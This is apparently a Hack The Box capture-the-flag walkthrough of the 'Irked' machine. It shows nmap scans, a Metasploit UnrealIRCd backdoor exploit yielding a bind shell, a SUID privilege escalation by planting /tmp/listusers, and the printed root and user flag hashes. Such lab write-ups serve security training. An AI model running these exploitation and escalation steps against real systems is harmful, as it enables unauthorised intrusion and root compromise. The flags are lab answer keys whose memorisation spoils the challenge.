Machine IP - 10.10.10.117
Starting with an nmap scan, we get the following result -
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 18:16 +04
Nmap scan report for 10.10.10.117
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
60500/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds
We can check the IRC service. It can be searched for service enumeration, which gives us the hint that it is Unreal IRCd
. This can be searched for exploits on metasploit as follows -
root@kali:~/Desktop/Hack The Box/irked# nmap -sV -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 22:31 +04
Nmap scan report for 10.10.10.117
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
From here, we can use metasploit for the exploit as follows -
root@kali:~/Desktop/Hack The Box/irked# msfconsole -q
msf5 > search unreal ircd
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
###### trying the excellent one
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.12.66:41567 -> 10.10.10.117:4444) at 2019-03-17 22:03:24 +0400
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty; pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
This gives us the reverse shell from the vulnerable irc chat. Now to do a privilege escalation, we can do a search for the setuid binaries available to the ircd user. sudo -l
seems to be a good starting point, but unfortunately returns nothing, in fact sudo isn't executable by the user. So, find
command can be used instead as follows -
ircd@irked:~/Unreal3.2$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~/Unreal3.2$ find / -perm 4755 2>/dev/null
find / -perm 4755 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
The viewuser command seems to be the only odd one out i.e., all others seem to be a command that is generally present in a unix system. Therefore, we try running the command -
ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-03-25 01:42 (:0)
sh: 1: /tmp/listusers: not found
The last line above is an error of bash where it is not able to find a binary /tmp/listusers
to execute. Since the command viewuser
is a setuid, maybe if it executes /bin/bash it can give a root shell. Therefore, we can try to create a file at the desired location, which is definitely in permissible bounds as tmp is writeable by all users.
ircd@irked:~/Unreal3.2$ echo "/bin/bash" > /tmp/listusers
echo "/bin/bash" > /tmp/listusers
ircd@irked:~/Unreal3.2$ chmod 777 /tmp/listusers
chmod 777 /tmp/listusers
ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-03-25 01:42 (:0)
root@irked:~/Unreal3.2# cd ..
cd ..
root@irked:~# ls
ls
Unreal3.2
root@irked:~# cd ..
cd ..
root@irked:/home# ls
ls
djmardov ircd
root@irked:/home# cd djmardov
cd djmardov
root@irked:/home/djmardov# ls
ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@irked:/home/djmardov# cd Desktop
cd Desktop
root@irked:/home/djmardov/Desktop# ls
ls
root@irked:/home/djmardov/Desktop# cd ../..
cd ../..
root@irked:/home# cd /root
cd /root
root@irked:/root# cat root.txt
cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3
root@irked:/root# cd /
cd /
root@irked:/# find / -name user.txt 2>/dev/null
find / -name user.txt 2>/dev/null
/home/djmardov/Documents/user.txt
root@irked:/# cat /home/djmardov/Documents/user.txt
cat /home/djmardov/Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
Thus, we get root and can read both the flags.